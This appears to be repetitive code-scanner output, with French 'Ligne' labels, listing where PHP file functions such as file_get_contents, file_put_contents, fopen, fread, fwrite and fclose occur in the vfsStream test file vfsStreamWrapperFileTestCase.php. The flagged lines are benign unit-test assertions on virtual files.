    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fread was found in the file vfsStreamWrapperFileTestCase.php
    Ligne134: $this->assertEquals('z', fread($fp, 1));
    Ligne136: $this->assertEquals(' 1', fread($fp, 8092));
    Ligne249: $this->assertEquals('baz2', fread($fp, 4096));
    Ligne263: $this->assertEquals('', fread($fp, 4096));
    Ligne266: $this->assertEquals('', fread($fp, 4096));
    Ligne279: $this->assertEquals('', fread($fp, 4096));
    Ligne282: $this->assertEquals('', fread($fp, 4096));
    Ligne296: $this->assertEquals('', fread($fp, 4096));
    Ligne299: $this->assertEquals('', fread($fp, 4096));
    fread was found in the file vfsStreamWrapperFileTestCase.php
    Ligne134: $this->assertEquals('z', fread($fp, 1));
    Ligne136: $this->assertEquals(' 1', fread($fp, 8092));
    Ligne249: $this->assertEquals('baz2', fread($fp, 4096));
    Ligne263: $this->assertEquals('', fread($fp, 4096));
    Ligne266: $this->assertEquals('', fread($fp, 4096));
    Ligne279: $this->assertEquals('', fread($fp, 4096));
    Ligne282: $this->assertEquals('', fread($fp, 4096));
    Ligne296: $this->assertEquals('', fread($fp, 4096));
    Ligne299: $this->assertEquals('', fread($fp, 4096));
    fclose was found in the file vfsStreamWrapperFileTestCase.php
    Ligne138: $this->assertTrue(fclose($fp));
    Ligne180: fclose($fp);
    Ligne194: fclose($fp);
    Ligne251: fclose($fp);
    Ligne267: fclose($fp);
    Ligne283: fclose($fp);
    Ligne300: fclose($fp);
    Ligne328: fclose($fp);
    Ligne341: fclose($fp);
    Ligne355: fclose($fp);
    Ligne369: fclose($fp);
    Ligne382: fclose($fp);
    Ligne395: fclose($fp);
    Ligne408: fclose($fp);
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fwrite was found in the file vfsStreamWrapperFileTestCase.php
    Ligne179: fwrite($fp, 'd');
    Ligne193: fwrite($fp, 'test');
    Ligne250: $this->assertEquals(0, fwrite($fp, 'foo'));
    Ligne264: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne280: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne297: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne339: fwrite($fp, 'some content');
    Ligne353: fwrite($fp, 'some content');
    fclose was found in the file vfsStreamWrapperFileTestCase.php
    Ligne138: $this->assertTrue(fclose($fp));
    Ligne180: fclose($fp);
    Ligne194: fclose($fp);
    Ligne251: fclose($fp);
    Ligne267: fclose($fp);
    Ligne283: fclose($fp);
    Ligne300: fclose($fp);
    Ligne328: fclose($fp);
    Ligne341: fclose($fp);
    Ligne355: fclose($fp);
    Ligne369: fclose($fp);
    Ligne382: fclose($fp);
    Ligne395: fclose($fp);
    Ligne408: fclose($fp);
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fwrite was found in the file vfsStreamWrapperFileTestCase.php
    Ligne179: fwrite($fp, 'd');
    Ligne193: fwrite($fp, 'test');
    Ligne250: $this->assertEquals(0, fwrite($fp, 'foo'));
    Ligne264: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne280: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne297: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne339: fwrite($fp, 'some content');
    Ligne353: fwrite($fp, 'some content');
    fclose was found in the file vfsStreamWrapperFileTestCase.php
    Ligne138: $this->assertTrue(fclose($fp));
    Ligne180: fclose($fp);
    Ligne194: fclose($fp);
    Ligne251: fclose($fp);
    Ligne267: fclose($fp);
    Ligne283: fclose($fp);
    Ligne300: fclose($fp);
    Ligne328: fclose($fp);
    Ligne341: fclose($fp);
    Ligne355: fclose($fp);
    Ligne369: fclose($fp);
    Ligne382: fclose($fp);
    Ligne395: fclose($fp);
    Ligne408: fclose($fp);
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
